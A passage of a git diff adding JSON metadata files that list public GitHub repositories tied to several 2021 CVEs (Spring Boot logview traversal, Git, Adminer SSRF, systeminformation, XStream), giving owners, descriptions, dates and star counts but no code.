+ "full_name": "PwCNO-CTO\/CVE-2021-21234",
+ "owner": {
+ "login": "PwCNO-CTO",
+ "id": 58770486,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58770486?v=4",
+ "html_url": "https:\/\/github.com\/PwCNO-CTO"
+ },
+ "html_url": "https:\/\/github.com\/PwCNO-CTO\/CVE-2021-21234",
+ "description": "Directory traversal vulnerability in the spring-boot-actuator-logview library",
+ "fork": false,
+ "created_at": "2021-06-08T15:31:54Z",
+ "updated_at": "2022-03-16T01:54:31Z",
+ "pushed_at": "2021-06-08T15:32:07Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 418722822,
+ "name": "CVE-2021-21234",
+ "full_name": "xiaojiangxl\/CVE-2021-21234",
+ "owner": {
+ "login": "xiaojiangxl",
+ "id": 58814935,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58814935?v=4",
+ "html_url": "https:\/\/github.com\/xiaojiangxl"
+ },
+ "html_url": "https:\/\/github.com\/xiaojiangxl\/CVE-2021-21234",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-19T01:08:48Z",
+ "updated_at": "2023-08-24T05:14:06Z",
+ "pushed_at": "2021-10-19T01:18:49Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21300.json b/2021/CVE-2021-21300.json
new file mode 100644
index 0000000000..491c40ea75
--- /dev/null
+++ b/2021/CVE-2021-21300.json
@@ -0,0 +1,482 @@
+[
+ {
+ "id": 346285133,
+ "name": "CVE-2021-21300",
+ "full_name": "AlkenePan\/CVE-2021-21300",
+ "owner": {
+ "login": "AlkenePan",
+ "id": 8273781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8273781?v=4",
+ "html_url": "https:\/\/github.com\/AlkenePan"
+ },
+ "html_url": "https:\/\/github.com\/AlkenePan\/CVE-2021-21300",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-10T08:29:49Z",
+ "updated_at": "2023-11-18T03:10:56Z",
+ "pushed_at": "2021-03-10T08:30:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 346425578,
+ "name": "CVE-2021-21300",
+ "full_name": "Faisal78123\/CVE-2021-21300",
+ "owner": {
+ "login": "Faisal78123",
+ "id": 2056026,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2056026?v=4",
+ "html_url": "https:\/\/github.com\/Faisal78123"
+ },
+ "html_url": "https:\/\/github.com\/Faisal78123\/CVE-2021-21300",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-10T16:45:46Z",
+ "updated_at": "2021-03-18T10:37:28Z",
+ "pushed_at": "2021-03-18T10:37:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 346434188,
+ "name": "CVE-2021-21300",
+ "full_name": "erranfenech\/CVE-2021-21300",
+ "owner": {
+ "login": "erranfenech",
+ "id": 52293769,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52293769?v=4",
+ "html_url": "https:\/\/github.com\/erranfenech"
+ },
+ "html_url": "https:\/\/github.com\/erranfenech\/CVE-2021-21300",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-10T17:15:49Z",
+ "updated_at": "2021-03-10T17:26:03Z",
+ "pushed_at": "2021-03-10T17:26:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 346559767,
+ "name": "CVE-2021-21300",
+ "full_name": "Maskhe\/CVE-2021-21300",
+ "owner": {
+ "login": "Maskhe",
+ "id": 30264078,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30264078?v=4",
+ "html_url": "https:\/\/github.com\/Maskhe"
+ },
+ "html_url": "https:\/\/github.com\/Maskhe\/CVE-2021-21300",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-11T02:57:11Z",
+ "updated_at": "2023-09-28T11:25:41Z",
+ "pushed_at": "2021-03-11T03:16:37Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 346572089,
+ "name": "CVE-2021-21300",
+ "full_name": "1uanWu\/CVE-2021-21300",
+ "owner": {
+ "login": "1uanWu",
+ "id": 23513206,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23513206?v=4",
+ "html_url": "https:\/\/github.com\/1uanWu"
+ },
+ "html_url": "https:\/\/github.com\/1uanWu\/CVE-2021-21300",
+ "description": "remote code exec for git",
+ "fork": false,
+ "created_at": "2021-03-11T03:59:49Z",
+ "updated_at": "2021-03-16T02:36:13Z",
+ "pushed_at": "2021-03-11T04:14:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 346654892,
+ "name": "CVE-2021-21300",
+ "full_name": "Kirill89\/CVE-2021-21300",
+ "owner": {
+ "login": "Kirill89",
+ "id": 2003936,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2003936?v=4",
+ "html_url": "https:\/\/github.com\/Kirill89"
+ },
+ "html_url": "https:\/\/github.com\/Kirill89\/CVE-2021-21300",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-11T09:56:03Z",
+ "updated_at": "2021-03-11T10:01:59Z",
+ "pushed_at": "2021-03-11T10:01:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 347847778,
+ "name": "cve-2021-21300",
+ "full_name": "ETOCheney\/cve-2021-21300",
+ "owner": {
+ "login": "ETOCheney",
+ "id": 28469578,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28469578?v=4",
+ "html_url": "https:\/\/github.com\/ETOCheney"
+ },
+ "html_url": "https:\/\/github.com\/ETOCheney\/cve-2021-21300",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-15T05:28:47Z",
+ "updated_at": "2021-03-15T05:30:16Z",
+ "pushed_at": "2021-03-15T05:30:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 355023650,
+ "name": "CVE-2021-21300",
+ "full_name": "fengzhouc\/CVE-2021-21300",
+ "owner": {
+ "login": "fengzhouc",
+ "id": 22309037,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22309037?v=4",
+ "html_url": "https:\/\/github.com\/fengzhouc"
+ },
+ "html_url": "https:\/\/github.com\/fengzhouc\/CVE-2021-21300",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-06T01:44:17Z",
+ "updated_at": "2021-04-06T02:14:31Z",
+ "pushed_at": "2021-04-06T02:14:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 355441102,
+ "name": "CVE-2021-21300",
+ "full_name": "danshuizhangyu\/CVE-2021-21300",
+ "owner": {
+ "login": "danshuizhangyu",
+ "id": 82081080,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82081080?v=4",
+ "html_url": "https:\/\/github.com\/danshuizhangyu"
+ },
+ "html_url": "https:\/\/github.com\/danshuizhangyu\/CVE-2021-21300",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-07T06:48:16Z",
+ "updated_at": "2021-04-08T01:46:54Z",
+ "pushed_at": "2021-04-08T01:46:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 407074218,
+ "name": "CVE-2021-21300",
+ "full_name": "0ahu\/CVE-2021-21300",
+ "owner": {
+ "login": "0ahu",
+ "id": 9623677,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9623677?v=4",
+ "html_url": "https:\/\/github.com\/0ahu"
+ },
+ "html_url": "https:\/\/github.com\/0ahu\/CVE-2021-21300",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-16T07:53:40Z",
+ "updated_at": "2021-09-16T07:53:40Z",
+ "pushed_at": "2021-09-16T07:53:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 470823423,
+ "name": "cve-2021-21300",
+ "full_name": "Jiang59991\/cve-2021-21300",
+ "owner": {
+ "login": "Jiang59991",
+ "id": 101699680,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101699680?v=4",
+ "html_url": "https:\/\/github.com\/Jiang59991"
+ },
+ "html_url": "https:\/\/github.com\/Jiang59991\/cve-2021-21300",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-17T02:37:58Z",
+ "updated_at": "2022-03-17T02:37:58Z",
+ "pushed_at": "2022-03-17T02:47:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 473848809,
+ "name": "cve-2021-21300-plus",
+ "full_name": "Jiang59991\/cve-2021-21300-plus",
+ "owner": {
+ "login": "Jiang59991",
+ "id": 101699680,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101699680?v=4",
+ "html_url": "https:\/\/github.com\/Jiang59991"
+ },
+ "html_url": "https:\/\/github.com\/Jiang59991\/cve-2021-21300-plus",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-25T02:59:41Z",
+ "updated_at": "2022-03-25T03:26:08Z",
+ "pushed_at": "2022-03-25T03:26:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 509747722,
+ "name": "CVE-2021-21300",
+ "full_name": "macilin\/CVE-2021-21300",
+ "owner": {
+ "login": "macilin",
+ "id": 10361930,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10361930?v=4",
+ "html_url": "https:\/\/github.com\/macilin"
+ },
+ "html_url": "https:\/\/github.com\/macilin\/CVE-2021-21300",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-07-02T12:19:21Z",
+ "updated_at": "2022-07-02T12:19:21Z",
+ "pushed_at": "2022-07-02T12:19:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 524400659,
+ "name": "CVE-2021-21300",
+ "full_name": "Roboterh\/CVE-2021-21300",
+ "owner": {
+ "login": "Roboterh",
+ "id": 86140745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86140745?v=4",
+ "html_url": "https:\/\/github.com\/Roboterh"
+ },
+ "html_url": "https:\/\/github.com\/Roboterh\/CVE-2021-21300",
+ "description": "the payload of CVE-2021-21300",
+ "fork": false,
+ "created_at": "2022-08-13T13:00:58Z",
+ "updated_at": "2022-08-13T13:22:15Z",
+ "pushed_at": "2022-08-13T13:22:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 636136004,
+ "name": "Network_Security_NYCU",
+ "full_name": "henry861010\/Network_Security_NYCU",
+ "owner": {
+ "login": "henry861010",
+ "id": 98812000,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98812000?v=4",
+ "html_url": "https:\/\/github.com\/henry861010"
+ },
+ "html_url": "https:\/\/github.com\/henry861010\/Network_Security_NYCU",
+ "description": "CVE-2021-21300",
+ "fork": false,
+ "created_at": "2023-05-04T07:46:35Z",
+ "updated_at": "2023-05-18T02:39:14Z",
+ "pushed_at": "2023-05-18T02:41:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 711134863,
+ "name": "CVE-2021-21300",
+ "full_name": "Saboor-Hakimi-23\/CVE-2021-21300",
+ "owner": {
+ "login": "Saboor-Hakimi-23",
+ "id": 122254602,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122254602?v=4",
+ "html_url": "https:\/\/github.com\/Saboor-Hakimi-23"
+ },
+ "html_url": "https:\/\/github.com\/Saboor-Hakimi-23\/CVE-2021-21300",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-28T10:17:45Z",
+ "updated_at": "2023-10-28T10:20:20Z",
+ "pushed_at": "2023-10-28T10:30:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21311.json b/2021/CVE-2021-21311.json
new file mode 100644
index 0000000000..6bb634636c
--- /dev/null
+++ b/2021/CVE-2021-21311.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 459287435,
+ "name": "CVE-2021-21311",
+ "full_name": "llhala\/CVE-2021-21311",
+ "owner": {
+ "login": "llhala",
+ "id": 79380572,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79380572?v=4",
+ "html_url": "https:\/\/github.com\/llhala"
+ },
+ "html_url": "https:\/\/github.com\/llhala\/CVE-2021-21311",
+ "description": "Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.",
+ "fork": false,
+ "created_at": "2022-02-14T18:54:53Z",
+ "updated_at": "2023-10-11T21:10:10Z",
+ "pushed_at": "2022-02-14T19:01:29Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 652635516,
+ "name": "CVE-2021-21311",
+ "full_name": "omoknooni\/CVE-2021-21311",
+ "owner": {
+ "login": "omoknooni",
+ "id": 76114650,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76114650?v=4",
+ "html_url": "https:\/\/github.com\/omoknooni"
+ },
+ "html_url": "https:\/\/github.com\/omoknooni\/CVE-2021-21311",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-12T13:32:52Z",
+ "updated_at": "2023-11-21T21:01:52Z",
+ "pushed_at": "2023-07-17T09:09:10Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21315.json b/2021/CVE-2021-21315.json
new file mode 100644
index 0000000000..cb828752be
--- /dev/null
+++ b/2021/CVE-2021-21315.json
@@ -0,0 +1,195 @@
+[
+ {
+ "id": 343523383,
+ "name": "CVE-2021-21315-PoC",
+ "full_name": "ForbiddenProgrammer\/CVE-2021-21315-PoC",
+ "owner": {
+ "login": "ForbiddenProgrammer",
+ "id": 72838191,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72838191?v=4",
+ "html_url": "https:\/\/github.com\/ForbiddenProgrammer"
+ },
+ "html_url": "https:\/\/github.com\/ForbiddenProgrammer\/CVE-2021-21315-PoC",
+ "description": "CVE 2021-21315 PoC",
+ "fork": false,
+ "created_at": "2021-03-01T18:52:41Z",
+ "updated_at": "2024-06-23T02:50:28Z",
+ "pushed_at": "2021-06-09T13:27:20Z",
+ "stargazers_count": 154,
+ "watchers_count": 154,
+ "has_discussions": false,
+ "forks_count": 25,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cybersecurity",
+ "infosec",
+ "injection",
+ "nodejs",
+ "offensive-security",
+ "pentesting",
+ "proof-of-concept",
+ "redteaming",
+ "research",
+ "vulnerabilities",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 25,
+ "watchers": 154,
+ "score": 0,
+ "subscribers_count": 9
+ },
+ {
+ "id": 344455733,
+ "name": "CVE-2021-21315v2",
+ "full_name": "cherrera0001\/CVE-2021-21315v2",
+ "owner": {
+ "login": "cherrera0001",
+ "id": 19656010,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19656010?v=4",
+ "html_url": "https:\/\/github.com\/cherrera0001"
+ },
+ "html_url": "https:\/\/github.com\/cherrera0001\/CVE-2021-21315v2",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-04T11:47:18Z",
+ "updated_at": "2021-03-13T02:06:37Z",
+ "pushed_at": "2021-03-04T11:47:48Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 387065961,
+ "name": "CVE-2021-21315-exploit",
+ "full_name": "MazX0p\/CVE-2021-21315-exploit",
+ "owner": {
+ "login": "MazX0p",
+ "id": 54814433,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54814433?v=4",
+ "html_url": "https:\/\/github.com\/MazX0p"
+ },
+ "html_url": "https:\/\/github.com\/MazX0p\/CVE-2021-21315-exploit",
+ "description": "systeminformation",
+ "fork": false,
+ "created_at": "2021-07-18T01:18:31Z",
+ "updated_at": "2021-07-18T16:23:04Z",
+ "pushed_at": "2021-07-18T16:23:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 404010458,
+ "name": "CVE-2021-21315",
+ "full_name": "alikarimi999\/CVE-2021-21315",
+ "owner": {
+ "login": "alikarimi999",
+ "id": 90207127,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90207127?v=4",
+ "html_url": "https:\/\/github.com\/alikarimi999"
+ },
+ "html_url": "https:\/\/github.com\/alikarimi999\/CVE-2021-21315",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-07T14:31:20Z",
+ "updated_at": "2023-09-28T11:31:13Z",
+ "pushed_at": "2021-09-20T12:43:05Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 426512152,
+ "name": "CVE-2021-21315",
+ "full_name": "G01d3nW01f\/CVE-2021-21315",
+ "owner": {
+ "login": "G01d3nW01f",
+ "id": 75846902,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4",
+ "html_url": "https:\/\/github.com\/G01d3nW01f"
+ },
+ "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2021-21315",
+ "description": "rust noob tried write easy exploit code with rust lang",
+ "fork": false,
+ "created_at": "2021-11-10T06:40:17Z",
+ "updated_at": "2021-12-27T01:30:24Z",
+ "pushed_at": "2021-12-27T01:30:21Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 427956887,
+ "name": "CVE-2021-21315-POC",
+ "full_name": "xMohamed0\/CVE-2021-21315-POC",
+ "owner": {
+ "login": "xMohamed0",
+ "id": 94008154,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94008154?v=4",
+ "html_url": "https:\/\/github.com\/xMohamed0"
+ },
+ "html_url": "https:\/\/github.com\/xMohamed0\/CVE-2021-21315-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-14T14:52:25Z",
+ "updated_at": "2021-11-14T14:53:06Z",
+ "pushed_at": "2021-11-14T14:53:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21341.json b/2021/CVE-2021-21341.json
new file mode 100644
index 0000000000..8b04a8635d
--- /dev/null
+++ b/2021/CVE-2021-21341.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 365686424,
+ "name": "CVE-2021-21341",
+ "full_name": "s-index\/CVE-2021-21341",
+ "owner": {
+ "login": "s-index",
+ "id": 56715563,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56715563?v=4",
+ "html_url": "https:\/\/github.com\/s-index"
+ },
+ "html_url": "https:\/\/github.com\/s-index\/CVE-2021-21341",
+ "description": "XStream DoS CVE-2021-21341",
+ "fork": false,
+ "created_at": "2021-05-09T06:46:38Z",
+ "updated_at": "2021-05-09T06:48:28Z",
+ "pushed_at": "2021-05-09T06:48:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 470049863,
+ "name": "ka-cve-2021-21341",
+ "full_name": "Mani1325\/ka-cve-2021-21341",
+ "owner": {
+ "login": "Mani1325",
+ "id": 96471113,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96471113?v=4",
+ "html_url": "https:\/\/github.com\/Mani1325"
+ },
+ "html_url": "https:\/\/github.com\/Mani1325\/ka-cve-2021-21341",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-15T07:28:52Z",
+ "updated_at": "2022-03-15T07:38:51Z",
+ "pushed_at": "2022-03-15T07:38:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21349.json b/2021/CVE-2021-21349.json
new file mode 100644
index 0000000000..c53e2a149b
--- /dev/null
+++ b/2021/CVE-2021-21349.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 365687047,
+ "name": "CVE-2021-21349",
+ "full_name": "s-index\/CVE-2021-21349",
+ "owner": {
+ "login": "s-index",
+ "id": 56715563,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56715563?v=4",
+ "html_url": "https:\/\/github.com\/s-index"
+ },
+ "html_url": "https:\/\/github.com\/s-index\/CVE-2021-21349",
+ "description": "XStream SSRF CVE-2021-21349",
+ "fork": false,
+ "created_at": "2021-05-09T06:50:31Z",
+ "updated_at": "2021-06-09T15:09:36Z",
+ "pushed_at": "2021-05-09T06:54:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21380.json b/2021/CVE-2021-21380.json
new file mode 100644
index 0000000000..d673c502ea
--- /dev/null
+++ b/2021/CVE-2021-21380.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 574737413,
+ "name": "codeql-workshop-cve-2021-21380",
+ "full_name": "rvermeulen\/codeql-workshop-cve-2021-21380",
+ "owner": {
+ "login": "rvermeulen",
+ "id": 636626,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/636626?v=4",
+ "html_url": "https:\/\/github.com\/rvermeulen"
+ },
+ "html_url": "https:\/\/github.com\/rvermeulen\/codeql-workshop-cve-2021-21380",
+ "description": "A CodeQL workshop covering CVE-2021-21380",
+ "fork": false,
+ "created_at": "2022-12-06T00:53:08Z",
+ "updated_at": "2024-05-23T10:40:38Z",
+ "pushed_at": "2024-04-22T15:40:23Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21389.json b/2021/CVE-2021-21389.json
new file mode 100644
index 0000000000..0b7c511c8b
--- /dev/null
+++ b/2021/CVE-2021-21389.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 372529238,
+ "name": "CVE-2021-21389",
+ "full_name": "HoangKien1020\/CVE-2021-21389",
+ "owner": {
+ "login": "HoangKien1020",
+ "id": 24661746,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24661746?v=4",
+ "html_url": "https:\/\/github.com\/HoangKien1020"
+ },
+ "html_url": "https:\/\/github.com\/HoangKien1020\/CVE-2021-21389",
